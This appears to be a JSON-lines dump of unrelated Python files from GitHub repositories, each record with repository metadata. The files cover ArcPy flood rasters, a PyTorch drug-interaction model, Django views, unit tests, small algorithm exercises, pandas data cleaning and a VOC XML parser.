arcpy.MosaicToNewRaster_management(listRasters, os.path.dirname(mosaic_raster), os.path.basename(mosaic_raster),\n desc.spatialReference,\n \"32_BIT_FLOAT\", x, 1, \"FIRST\", \"\")\n\n # now we do an isnull on raster domain poly\n assignmentType = \"CELL_CENTER\"\n priorityField = \"#\"\n\n # Execute PolygonToRaster\n calc_field = \"value_field\"\n common_lib.delete_add_field(raster_polygons, calc_field, \"DOUBLE\")\n arcpy.CalculateField_management(raster_polygons, calc_field, 1, \"PYTHON_9.3\")\n\n if use_in_memory:\n poly_raster = \"in_memory/poly_raster\"\n else:\n poly_raster = os.path.join(scratch_ws, \"poly_raster\")\n if arcpy.Exists(poly_raster):\n arcpy.Delete_management(poly_raster)\n\n arcpy.PolygonToRaster_conversion(raster_polygons, calc_field, poly_raster, assignmentType, priorityField, x)\n\n # create isnull\n if use_in_memory:\n is_null2 = \"in_memory/isnull_copy2\"\n else:\n is_null2 = os.path.join(scratch_ws, \"isnull_copy2\")\n\n if arcpy.Exists(is_null2):\n arcpy.Delete_management(is_null2)\n\n is_Null_raster2 = arcpy.sa.IsNull(poly_raster)\n is_Null_raster2.save(is_null2)\n\n # con on mosaic\n finalRaster = arcpy.sa.Con(is_null2, poly_raster, mosaic_raster)\n finalRaster.save(output_raster)\n else:\n arcpy.AddWarning(\n \"Cell size of \" + common_lib.get_name_from_feature_class(input_source) + \" is different than \" + org_depth_raster + \". Exiting...\")\n\n output_raster = None\n\n if use_in_memory:\n arcpy.Delete_management(\"in_memory\")\n\n else: # use default depth value\n raise NoInputLayer\n\n end_time = time.clock()\n msg_body = create_msg_body(\"Set Flood Elevation Value for Raster completed successfully.\", start_time, end_time)\n msg(msg_body)\n\n arcpy.ClearWorkspaceCache_management()\n\n return output_raster\n else:\n raise LicenseErrorSpatial\n else:\n raise LicenseError3D\n\n arcpy.ClearWorkspaceCache_management()\n\n\n except MixOfSR:\n # The input has mixed SR\n #\n print(('Input data has mixed spatial references. Ensure all input is in the same spatial reference, including the same vertical units.'))\n arcpy.AddError('Input data has mixed spatial references. Ensure all input is in the same spatial reference, including the same vertical units.')\n\n except NoInputLayer:\n print(\"Can't find Input layer. Exiting...\")\n arcpy.AddError(\"Can't find Input layer. Exiting...\")\n\n except NoDepthRaster:\n print(\"Can't find Depth raster. Exiting...\")\n arcpy.AddError(\"Can't find depth raster. Exiting...\")\n\n except NotProjected:\n print(\"Input data needs to be in a projected coordinate system. Exiting...\")\n arcpy.AddError(\"Input data needs to be in a projected coordinate system. Exiting...\")\n\n except NoLayerFile:\n print(\"Can't find Layer file. Exiting...\")\n arcpy.AddError(\"Can't find Layer file. Exiting...\")\n\n except LicenseError3D:\n print(\"3D Analyst license is unavailable\")\n arcpy.AddError(\"3D Analyst license is unavailable\")\n\n except LicenseErrorSpatial:\n print(\"Spatial Analyst license is unavailable\")\n arcpy.AddError(\"Spatial Analyst license is unavailable\")\n\n except NoNoDataError:\n print(\"Input raster does not have NODATA values\")\n arcpy.AddError(\"Input raster does not have NODATA values\")\n\n except NoUnits:\n print(\"No units detected on input data\")\n arcpy.AddError(\"No units detected on input data\")\n\n except NoPolygons:\n print(\"Input data can only be polygon features or raster datasets.\")\n arcpy.AddError(\"Input data can only be polygon features or raster datasets.\")\n\n except ValueError:\n print(\"Input no flood value is not a number.\")\n arcpy.AddError(\"Input no flood value is not a number.\")\n\n except arcpy.ExecuteError:\n line, filename, synerror = trace()\n msg(\"Error on %s\" % line, ERROR)\n msg(\"Error in file name: %s\" % filename, ERROR)\n msg(\"With error message: %s\" % synerror, ERROR)\n msg(\"ArcPy Error Message: %s\" % arcpy.GetMessages(2), ERROR)\n\n except FunctionError as f_e:\n messages = f_e.args[0]\n msg(\"Error in function: %s\" % messages[\"function\"], ERROR)\n msg(\"Error on %s\" % messages[\"line\"], ERROR)\n msg(\"Error in file name: %s\" % messages[\"filename\"], ERROR)\n msg(\"With error message: %s\" % messages[\"synerror\"], ERROR)\n msg(\"ArcPy Error Message: %s\" % messages[\"arc\"], ERROR)\n\n except:\n line, filename, synerror = trace()\n msg(\"Error on %s\" % line, ERROR)\n msg(\"Error in file name: %s\" % filename, ERROR)\n msg(\"with error message: %s\" % synerror, ERROR)\n\n finally:\n arcpy.CheckInExtension(\"3D\")\n arcpy.CheckInExtension(\"Spatial\")\n\n\n# for debug only!\nif __name__ == \"__main__\":\n create_raster(\"\", \"\", \"\", \"\", 1)","repo_name":"gvanmaren/3D-Flood-Impact","sub_path":"Toolboxes/scripts/create_depth_raster.py","file_name":"create_depth_raster.py","file_ext":"py","file_size_in_byte":25460,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"32521273360","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom gnn_encoder import encoder\r\n\r\nclass complex_fuse_base(nn.Module):\r\n def __init__(self, drug_node_num, protein_node_num, fp_dim,\r\n h_dim, out_dim, num_base, target_num, dropout,\r\n num_rela, ablation, drug_mark, o_fun, classifier='cip'):\r\n super(complex_fuse_base, self).__init__()\r\n self.cmlp = ablation['cmlp']\r\n self.drug_mark = drug_mark\r\n self.encoder = encoder(drug_node_num, protein_node_num, fp_dim,\r\n h_dim, out_dim, num_base, target_num, dropout,\r\n drug_mark=self.drug_mark)\r\n self.fp_fc_layer = nn.Linear(h_dim, out_dim, bias=False)\r\n self.skip_fc_layer = nn.Linear(h_dim, out_dim, bias=False)\r\n\r\n self.layer_norm_weight = nn.LayerNorm(out_dim, elementwise_affine=False)\r\n self.layer_norm_weight_hdim = nn.LayerNorm(h_dim, elementwise_affine=False)\r\n\r\n self.ablation = ablation\r\n\r\n if self.cmlp:\r\n\r\n self.rela_linear_r1 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_r2 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_i1 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n self.rela_linear_i2 = nn.Parameter(torch.Tensor(out_dim, out_dim))\r\n nn.init.xavier_uniform_(self.rela_linear_r1,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_r2,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_i1,\r\n gain=nn.init.calculate_gain('relu'))\r\n nn.init.xavier_uniform_(self.rela_linear_i2,\r\n gain=nn.init.calculate_gain('relu'))\r\n\r\n self.classifier = classifier\r\n self.o_fun = o_fun\r\n if classifier == 'mlp':\r\n self.w_relation = nn.Parameter(torch.Tensor(num_rela, 2 * out_dim)) # C,F\r\n nn.init.xavier_uniform_(self.w_relation,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n if classifier == 'cip':\r\n self.w_relationR = nn.Parameter(torch.Tensor(num_rela, out_dim))\r\n self.w_relationI = nn.Parameter(torch.Tensor(num_rela, out_dim))\r\n nn.init.xavier_uniform_(self.w_relationR,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n nn.init.xavier_uniform_(self.w_relationI,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n\r\n if ablation['method'] == 'quate':\r\n self.w_relation = nn.Parameter(torch.Tensor(num_rela, 4 * out_dim)) # C,F\r\n nn.init.xavier_uniform_(self.w_relation,\r\n gain=nn.init.calculate_gain('sigmoid'))\r\n\r\n self.b_relation = nn.Parameter(torch.zeros(num_rela), requires_grad=True)\r\n\r\n def forward(self,\r\n fp,\r\n drug_node_id,\r\n kg_node_id,\r\n adj_list, # [d-d, d-t, p-p]\r\n idx1,\r\n idx2,\r\n idx3):\r\n drug_fp, drug_init, x1, x2 = self.encoder(fp, drug_node_id, kg_node_id, adj_list)\r\n\r\n drug_fp = F.elu(self.layer_norm_weight_hdim(drug_fp))\r\n x_fp = F.elu(self.fp_fc_layer(drug_fp))\r\n x_drug_skip = self.skip_fc_layer(drug_init)\r\n if self.ablation['method'] == 'ASC':\r\n R1 = x1[idx1] + x_fp[idx2]\r\n Ima1 = x2[idx1] + x_drug_skip[idx2]\r\n R2 = x_drug_skip[idx1] + x2[idx2]\r\n Ima2 = x_fp[idx1] + x1[idx2]\r\n\r\n if self.cmlp:\r\n R1, Ima1 = self.complex_nn(R1, Ima1,\r\n self.rela_linear_r1, self.rela_linear_i1)\r\n R2, Ima2 = self.complex_nn(R2, Ima2,\r\n self.rela_linear_r2, self.rela_linear_i2)\r\n\r\n R1 = self.layer_norm_weight(R1)\r\n Ima1 = self.layer_norm_weight(Ima1)\r\n R2 = self.layer_norm_weight(R2)\r\n Ima2 = self.layer_norm_weight(Ima2)\r\n\r\n R, Ima = self.complex_mult(R1, Ima1, R2, Ima2)\r\n\r\n R = self.layer_norm_weight(R)\r\n Ima = self.layer_norm_weight(Ima)\r\n\r\n if self.classifier == 'mlp':\r\n lr = torch.cat((R, Ima), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n if self.classifier == 'cip':\r\n r_, i_ = self.complex_inner(R, Ima, self.w_relationR[idx3], self.w_relationI[idx3])\r\n if self.o_fun == 'SUM':\r\n output = torch.sigmoid(r_ + i_)\r\n if self.o_fun == 'RE':\r\n output = torch.sigmoid(r_)\r\n\r\n if self.ablation['method'] == 'SC':\r\n x1_intra = x1 + x_fp\r\n x2_intra = x2 + x_drug_skip\r\n R1 = x1_intra[idx1] # h\r\n Ima1 = x2_intra[idx1] # h\r\n R2 = x2_intra[idx2] # t\r\n Ima2 = x1_intra[idx2] # t\r\n R1 = self.layer_norm_weight(R1)\r\n Ima1 = self.layer_norm_weight(Ima1)\r\n R2 = self.layer_norm_weight(R2)\r\n Ima2 = self.layer_norm_weight(Ima2)\r\n\r\n R, Ima = self.complex_mult(R1, Ima1, R2, Ima2)\r\n\r\n R = self.layer_norm_weight(R)\r\n Ima = self.layer_norm_weight(Ima)\r\n\r\n if self.classifier == 'mlp':\r\n lr = torch.cat((R, Ima), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n if self.classifier == 'cip':\r\n r_, i_ = self.complex_inner(R, Ima, self.w_relationR[idx3], self.w_relationI[idx3])\r\n if self.o_fun == 'SUM':\r\n output = torch.sigmoid(r_ + i_)\r\n if self.o_fun == 'RE':\r\n output = torch.sigmoid(r_)\r\n\r\n elif self.method == 'quate':\r\n x1 = self.layer_norm_weight(x1)\r\n x2 = self.layer_norm_weight(x2)\r\n x_fp = self.layer_norm_weight(x_fp)\r\n x_drug_skip = self.layer_norm_weight(x_drug_skip)\r\n a, b, c, d = x1[idx1], x2[idx1], x_fp[idx1], x_drug_skip[idx1]\r\n p, q, u, v = x1[idx2], x2[idx2], x_fp[idx2], x_drug_skip[idx2]\r\n R = a * p - b * q - c * u - d * v\r\n Ima1 = a * q + b * p + c * v - d * u\r\n Ima2 = a * u - b * v + c * p + d * q\r\n Ima3 = a * v + b * u - c * q + d * p\r\n lr = torch.cat((R, Ima1, Ima2, Ima3), dim=1)\r\n output = torch.sigmoid(torch.sum(lr * self.w_relation[idx3], dim=1).reshape(-1) + \\\r\n self.b_relation[idx3])\r\n\r\n return output\r\n\r\n def complex_mult(self, R1, Ima1, R2, Ima2):\r\n R = R1 * R2 - Ima1 * Ima2\r\n Ima = R1 * Ima2 + Ima1 * R2\r\n return R, Ima\r\n\r\n def complex_nn(self, R, Ima, W_R, W_I):\r\n r_trans = torch.mm(R, W_R) - torch.mm(Ima, W_I)\r\n i_trans = torch.mm(R, W_I) + torch.mm(Ima, W_R)\r\n r_trans = F.relu(r_trans)\r\n i_trans = F.relu(i_trans)\r\n return r_trans, i_trans\r\n\r\n def complex_inner(self, R, Ima, w_r, w_i):\r\n r_ = torch.sum(R * w_r, dim=1) - torch.sum(Ima * (-1) * w_i, dim=1)\r\n i_ = torch.sum(R * (-1) * w_i, dim=1) + torch.sum(Ima * w_r, dim=1)\r\n return r_, i_","repo_name":"zhanglabNKU/DMCF-DDI","sub_path":"DMCF_DDI.py","file_name":"DMCF_DDI.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36641401013","text":"import unittest\nimport unittest.mock as mock\n\nimport filters.allbatchfilter as allbatchfilter\n\n\nclass AllBatchFilterTests(unittest.TestCase):\n def test_constructor_succeeds(self):\n allbatchfilter.AllBatchFilter(mock.Mock())\n\n def test_filter_items_calls_filter_items_on_subfilters(self):\n items = [mock.Mock(), mock.Mock(), mock.Mock()]\n result_items = [mock.Mock(), mock.Mock()]\n\n filter1 = self._create_filter(True)\n filter1.filter_items = mock.MagicMock(items)\n filter2 = self._create_filter(True)\n filter2.filter_items = mock.MagicMock(return_value=result_items)\n\n batch_filter = allbatchfilter.AllBatchFilter(mock.Mock())\n batch_filter.add_filter(filter1)\n batch_filter.add_filter(filter2)\n\n results = batch_filter.filter_items(items)\n self.assertEqual(result_items, results)\n\n filter1.filter_items.assert_called()\n filter2.filter_items.assert_called()\n\n def test_is_match_does_not_return_item_if_no_subfilters_return_true(self):\n self._execute_is_match_test(False, [False, False, False])\n\n def test_is_match_does_not_return_item_if_only_some_subfilters_return_true(self):\n self._execute_is_match_test(False, [False, True, False])\n\n def test_is_match_returns_item_if_all_filters_return_true(self):\n self._execute_is_match_test(True, [True, True, True])\n\n def _execute_is_match_test(self, expected_result, filter_results):\n batch_filter = allbatchfilter.AllBatchFilter(mock.Mock())\n for filter_result in filter_results:\n batch_filter.add_filter(self._create_filter(filter_result))\n self.assertEqual(expected_result, batch_filter.is_match(mock.Mock()))\n\n def _create_filter(self, return_value):\n mock_filter = mock.Mock()\n mock_filter.is_match = mock.MagicMock(return_value=return_value)\n return mock_filter\n","repo_name":"kemmot/PyTasks","sub_path":"tasks/tests/allbatchfilter_test.py","file_name":"allbatchfilter_test.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73407726306","text":"from multiprocessing import context\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom Empleados.forms import EquipoFormulario, LiderFormulario, RegistroFormulario, AvatarFormulario\nfrom Empleados.models import Equipo, Lider, Colaborador, Post, Avatar\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth import login, authenticate\n\n\n\ndef register(request):\n\n if request.method == 'POST': \n\n form = RegistroFormulario(request.POST) \n\n if form.is_valid():\n\n user=form.cleaned_data['username']\n form.save()\n \n return render(request, \"Empleados/inicio.html\", {'mensaje':\"Usuario Creado\"})\n \n else:\n\n form = RegistroFormulario() \n \n \n return render(request, \"Empleados/registro.html\", {'form':form})\n\n\n\n\ndef login_request(request):\n\n if request.method == 'POST': \n\n form = AuthenticationForm(request, data = request.POST) \n\n if form.is_valid():\n \n usuario=form.cleaned_data.get('username') \n contra=form.cleaned_data.get('password') \n\n user=authenticate(username=usuario, password=contra) \n\n if user: \n\n login(request, user) \n\n \n return render(request, \"Empleados/inicio.html\", {'mensaje':f\"Bienvenido {user}\"}) \n\n else: \n return render(request, \"Empleados/inicio.html\", {'mensaje':\"Error. Datos incorrectos\"})\n\n else:\n \n form = AuthenticationForm() \n\n \n return render(request, \"/Empleados/login.html\", {'form':form}) \n\n\n\n@login_required\ndef inicio(request):\n\n\n return render(request,\"Empleados/inicio.html\")\n\n@login_required\ndef agregarImagen(request):\n\n if request.method == 'POST': \n\n miFormulario = AvatarFormulario(request.POST, request.FILES) \n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data\n\n avatar = Avatar(user=request.user, imagen=informacion['imagen'])\n\n avatar.save()\n\n return render(request, \"Empleados/inicio.html\")\n\n else:\n\n miFormulario = AvatarFormulario()\n \n return render(request, \"Empleados/agregarImg.html\", {'form':miFormulario})\n\n@login_required\ndef agregarEquipo(request):\n\n \n if request.method == 'POST': \n\n miFormulario = EquipoFormulario(request.POST) \n\n print(miFormulario)\n\n if miFormulario.is_valid(): \n\n informacion = miFormulario.cleaned_data\n\n equipo = Equipo(nombre=informacion['nombre'], equipo=informacion['equipo'], conformacion=informacion['conformacion']) \n\n equipo.save()\n\n return render(request, \"Empleados/inicio.html\") \n\n else:\n\n miFormulario = EquipoFormulario() \n\n dict1={\"miFormulario\":miFormulario}\n\n return render(request, \"Empleados/Equipo.html\", dict1)\n\n@login_required\ndef agregarColaborador(request):\n\n return render(request, \"Empleado/colaborador.html\")\n\n@login_required\ndef agregarPosteo(request):\n\n return render(request, \"Empleado/posteo.html\")\n\n\n\n@login_required\ndef agregarLider(request):\n\n\n if request.method == 'POST': \n\n miFormulario = LiderFormulario(request.POST)\n\n if miFormulario.is_valid():\n\n info = miFormulario.cleaned_data \n lider = Lider(nombre=info['nombre'], apellido=info['apellido'],\n email=info['email'],area=info['Area'])\n\n lider.save()\n\n return render(request, \"Empleados/inicio.html\")\n\n else:\n\n miFormulario = LiderFormulario()\n\n dict1={'myForm':miFormulario}\n\n return render(request,\"Empleados/lider.html\", dict1)\n\n\n\n@login_required\ndef busquedaEquipo(request):\n\n return render(request, \"Empleados/busquedaEquipo.html\")\n\n\n\n@login_required\ndef buscar(request):\n\n\n if request.GET['equipo']:\n\n equipo = request.GET['equipo'] \n equipos = Equipo.objects.filter(equipo__iexact=equipo)\n\n return render(request, \"Empleados/resultadosBusqueda.html\", {\"equipos\":equipos, \"equipo\":equipo})\n\n else:\n\n respuesta=\"No detectamos el envio de la data\"\n \n return HttpResponse(respuesta)\n\n\n@login_required\ndef borrarLideres(request, lider_nombre):\n\n lider = Lider.objects.get(nombre=lider_nombre)\n \n lider.delete()\n \n lideres = Lider.objects.all()\n\n contexto={\"lideres\":lideres}\n\n return render(request, \"Empleados/liederes_list.html\",contexto)\n\n@login_required\ndef editarLideres(request, lider_nombre):\n\n lider = Lider.objects.get(nombre=lider_nombre)\n\n if request.method == \"POST\":\n\n miFormulario = LiderFormulario(request.POST)\n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data\n\n lider.nombre = informacion['nombre']\n lider.apellido = informacion['apellido']\n lider.email = informacion['email']\n lider.area = informacion['area']\n\n lider.save()\n\n return render(request, \"Empleados/inicio.html\")\n\n else:\n\n miFormulario= LiderFormulario(initial={'nombre':lider.nombre, 'apellido':lider.apellido,\n 'email':lider.email, 'area':lider.area})\n\n return render(request, \"Empleado/lider_Editar.html\",{'miFormulario':miFormulario, 'lider_nombre':lider_nombre})\n\n@login_required\ndef editarUsuario(request):\n\n usuario = request.user \n\n if request.method == \"POST\": \n\n miFormulario = RegistroFormulario(request.POST) \n\n if miFormulario.is_valid():\n\n informacion = miFormulario.cleaned_data \n\n usuario.username = informacion['username']\n usuario.email = informacion['email']\n usuario.password1 = informacion['password1']\n usuario.password2 = informacion['password1']\n usuario.save()\n\n return render(request, \"Empleado/inicio.html\")\n\n else:\n\n miFormulario= RegistroFormulario(initial={'username':usuario.username, 'email':usuario.email})\n\n return render(request, \"Empleado/editarUsuario.html\",{'miFormulario':miFormulario, 'usuario':usuario.username})\n\n\n\n\n@login_required\n\ndef listaLideres(request):\n\n lideres = Lider.objects.all() \n\n\n contexto = {\"lideres\":lideres}\n return render(request, \"Empleado/leerLideres.html\",contexto)\n\n\n\n\nclass EquipoList(LoginRequiredMixin, ListView):\n\n model = Equipo\n template_name = \"Empleado/listaEquipos.html\"\n\nclass EquipoDetalle(DetailView):\n\n model = Equipo\n template_name = \"Empleado/equipoDetalle.html\"\n\nclass EquipoCreacion(CreateView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n fields = ['nombre', 'equipo', 'duracion']\n\nclass EquipoUpdate(UpdateView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n fields = ['nombre', 'equipo', 'duracion']\n\n\nclass EquipoDelete(DeleteView):\n\n model = Equipo\n success_url = \"/Empleado/equipo/lista\"\n\n\nclass ColaboradorList(LoginRequiredMixin, ListView):\n\n model = Colaborador\n template_name = \"Empleado/listaColaborador.html\"","repo_name":"AbigailLiempe/EquipoBlog","sub_path":"Empleados/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35562025154","text":"from typing import Iterable\n\n\ndef can_balance(weights: Iterable) -> int:\n\n def is_balanced(_indx):\n data = [[reversed(weights[:_indx]), 0], [weights[_indx+1:], 0]]\n for lst in data:\n for _i, val in enumerate(lst[0]):\n lst[1] += val * (_i + 1)\n return data[0][1] == data[1][1]\n\n if len(weights) == 1:\n return 0\n size = len(weights) // 2\n\n for i in range(size):\n tmp = [is_balanced(size - i), is_balanced(size + i)]\n if any(tmp):\n return size - i if tmp[0] else size + i\n return -1\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(can_balance([6, 1, 10, 5, 4]))\n\n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert can_balance([6, 1, 10, 5, 4]) == 2\n assert can_balance([10, 3, 3, 2, 1]) == 1\n assert can_balance([7, 3, 4, 2, 9, 7, 4]) == -1\n assert can_balance([42]) == 0\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","repo_name":"olegJF/Checkio","sub_path":"Can_Balance.py","file_name":"Can_Balance.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39661913332","text":"# Import pandas\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Read the file into a DataFrame: df\ndf = pd.read_csv('DataSets/dob_job_application_filings_subset.csv')\n\n# Print the shape of df\nprint(df.shape)\n\n# Print the columns of df\nprint(df.columns)\n\ndf_subset = df[['Job #', 'Doc #', 'Borough', 'Initial Cost', 'Total Est. Fee',\n 'Existing Zoning Sqft', 'Proposed Zoning Sqft', 'Enlargement SQ Footage', 'Street Frontage',\n 'ExistingNo. of Stories', 'Proposed No. of Stories', 'Existing Height', 'Proposed Height']]\n# # Print the head and tail of df_subset\nprint(df_subset.head())\nprint(df_subset.tail())\n\n# Print the info of df_subset\nprint(df_subset.info())\n\nprint(df_subset.describe())\n\n# # FIND THE OUTLIERS\n#\n# Plot the histogram\ndf['Existing Zoning Sqft'].plot(kind='hist', rot=70, logx=True, logy=True)\n# Display the histogram\nplt.show()\n\nprint(df[['Initial Cost']].head())\ndf[\"initial_cost\"] = df[\"Initial Cost\"].apply(lambda x: float(x[1:]) if x else None)\nprint(df[['initial_cost']].head())\nprint(df['initial_cost'].value_counts(dropna=False))\n\n# Create the boxplot\ndf.boxplot(column='initial_cost', by='Borough', rot=90)\n# Display the plot\nplt.show()\n\n# Create and display the first scatter plot\ndf.plot(kind='scatter', x='initial_cost', y='total_est_fee', rot=70)\nplt.show()\n# Create and display the second scatter plot\ndf_subset.plot(kind='scatter', x='initial_cost', y='total_est_fee', rot=70)\nplt.show()\n","repo_name":"grommy/data_science_tutorial","sub_path":"beginner/cleaning_data/step_1.py","file_name":"step_1.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43034968808","text":"# Link: https://www.techiedelight.com/pots-gold-game-dynamic-programming/\n# Function to maximize the number of coins collected by a player,\n# assuming that opponent also plays optimally\ndef optimalStrategy(coin, i, j, lookup):\n \n # base case: one pot left, only one choice possible\n if i == j:\n return coin[i]\n \n # if we're left with only two pots, choose one with maximum coins\n if i + 1 == j:\n return max(coin[i], coin[j])\n \n # if sub-problem is seen for the first time, solve it and\n # store its result in a lookup table\n if lookup[i][j] == 0:\n # if player chooses front coin i, opponent is left to choose\n # from [i+1, j].\n # 1. if opponent chooses front coin i+1, recur for [i+2, j]\n # 2. if opponent chooses rear coin j, recur for [i+1, j-1]\n \n start = coin[i] + min(optimalStrategy(coin, i + 2, j, lookup),\n optimalStrategy(coin, i + 1, j - 1, lookup))\n \n # if player chooses rear coin j, opponent is left to choose\n # from [i, j-1].\n # 1. if opponent chooses front coin i, recur for [i+1, j-1]\n # 2. if opponent chooses rear coin j-1, recur for [i, j-2]\n \n end = coin[j] + min(optimalStrategy(coin, i + 1, j - 1, lookup),\n optimalStrategy(coin, i, j - 2, lookup))\n \n # assign maximum of two choices\n lookup[i][j] = max(start, end)\n \n # return the subproblem solution from the dict\n return lookup[i][j]\n \n \nif __name__ == '__main__':\n \n # pots of gold arranged in a line\n coin = [4, 6, 2, 3]\n \n # Create a table to store solutions of subproblems\n lookup = [[0 for x in range(len(coin))] for y in range(len(coin))]\n \n print(\"Maximum coins collected by player is\",\n optimalStrategy(coin, 0, len(coin) - 1, lookup))","repo_name":"mohitsaroha03/The-Py-Algorithms","sub_path":"src/zDynamicprogramming/pots-gold-game.py","file_name":"pots-gold-game.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6142159583","text":"import numpy as np\nimport os\nfrom xml.etree import ElementTree\n\nclass XMLParser(object):\n \"\"\" Preprocess the VOC2007 xml annotations data.\n\n # Arguments\n data_path: Data path to VOC2007 annotations\n\n # Return\n data: Dictionary which keys correspond to the image names\n and values are numpy arrays of shape (num_objects, 4 + num_classes)\n num_objects refers to the number of objects in that specific image\n \"\"\"\n\n def __init__(self, data_path, background_id=None, class_names=None):\n self.path_prefix = data_path\n self.background_id = background_id\n if class_names == None:\n self.arg_to_class = self._use_VOC2007_classes()\n else:\n if background_id != None and background_id != -1:\n class_names.insert(background_id, 'background')\n elif background_id == -1:\n class_names.append('background')\n keys = np.arange(len(class_names))\n self.arg_to_class = dict(zip(keys, class_names))\n\n self.class_to_arg = {value: key for key, value\n in self.arg_to_class.items()}\n self.data = dict()\n self._preprocess_XML()\n\n def _use_VOC2007_classes(self):\n class_names = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle',\n 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n 'dog', 'horse', 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor']\n if self.background_id != None and self.background_id != -1 :\n class_names.insert(self.background_id, 'background')\n elif self.background_id == -1:\n class_names.append('background')\n\n keys = np.arange(len(class_names))\n arg_to_class = dict(zip(keys, class_names))\n\n return arg_to_class\n\n def get_data(self):\n return self.data\n\n def _preprocess_XML(self):\n filenames = os.listdir(self.path_prefix)\n for filename in filenames:\n tree = ElementTree.parse(self.path_prefix + filename)\n root = tree.getroot()\n bounding_boxes = []\n one_hot_classes = []\n size_tree = root.find('size')\n width = float(size_tree.find('width').text)\n height = float(size_tree.find('height').text)\n for object_tree in root.findall('object'):\n for bounding_box in object_tree.iter('bndbox'):\n xmin = float(bounding_box.find('xmin').text) / width\n ymin = float(bounding_box.find('ymin').text) / height\n xmax = float(bounding_box.find('xmax').text) / width\n ymax = float(bounding_box.find('ymax').text) / height\n bounding_box = [xmin,ymin,xmax,ymax]\n bounding_boxes.append(bounding_box)\n class_name = object_tree.find('name').text\n one_hot_class = self._to_one_hot(class_name)\n one_hot_classes.append(one_hot_class)\n image_name = root.find('filename').text\n bounding_boxes = np.asarray(bounding_boxes)\n one_hot_classes = np.asarray(one_hot_classes)\n image_data = np.hstack((bounding_boxes, one_hot_classes))\n if len(bounding_boxes.shape) == 1:\n image_data = np.expand_dims(image_data, axis=0)\n self.data[image_name] = image_data\n\n def _to_one_hot(self, name):\n num_classes = len(self.class_to_arg)\n one_hot_vector = [0] * num_classes\n class_arg = self.class_to_arg[name]\n one_hot_vector[class_arg] = 1\n return one_hot_vector\n\nif __name__ == '__main__':\n data_path = '../../datasets/VOCdevkit/VOC2007/Annotations/'\n xml_parser = XMLParser(data_path, background_id=0)\n ground_truths = xml_parser.get_data()\n print(xml_parser.arg_to_class)\n\n","repo_name":"AloshkaD/SSD_sandox","sub_path":"tests/XML_parser.py","file_name":"XML_parser.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"18137461299","text":"class Bst:\n def __init__(self, data = None):\n self.data = data\n if self.data:\n self.left = Bst()\n self.right = Bst()\n else:\n self.left = None\n self.right = None\n\n def insert(self,data):\n if self.data is None:\n self.data = data\n self.left = Bst()\n self.right = Bst()\n elif self.data > data:\n if self.left is not None:\n self.left.insert(data)\n else:\n temp = Bst(data)\n self.left = temp\n else:\n if self.right is not None:\n self.right.insert(data)\n else:\n temp = Bst(data)\n self.right = temp\n\n def inorder(self):\n if self.data is None:\n return\n else:\n self.left.inorder()\n print(self.data)\n self.right.inorder()\n\n def insert_queue(self,queue):\n if self.left.data:\n queue.append(self.left)\n if self.right.data:\n queue.append(self.right)\n\n def levelorder(self):\n if self.data is None:\n return\n else:\n print(self.data)\n queue = []\n self.insert_queue(queue)\n while queue:\n print(queue[0].data)\n queue[0].insert_queue(queue)\n del queue[0]\n\n def printleaf(self):\n if self.data is None:\n return\n else:\n if self.left.data is None and self.right.data is None:\n print(self.data)\n self.left.printleaf()\n self.right.printleaf()\n\n def printleftnodes(self):\n if self.data is None:\n return\n else:\n print(self.data)\n self.left.printleaf()\n\n def printrightnodes(self):\n if self.data is None:\n return\n else:\n print(self.data)\n self.right.printleaf()\n\n def printedges(self):\n print(self.data)\n self.left.printleftnodes()\n 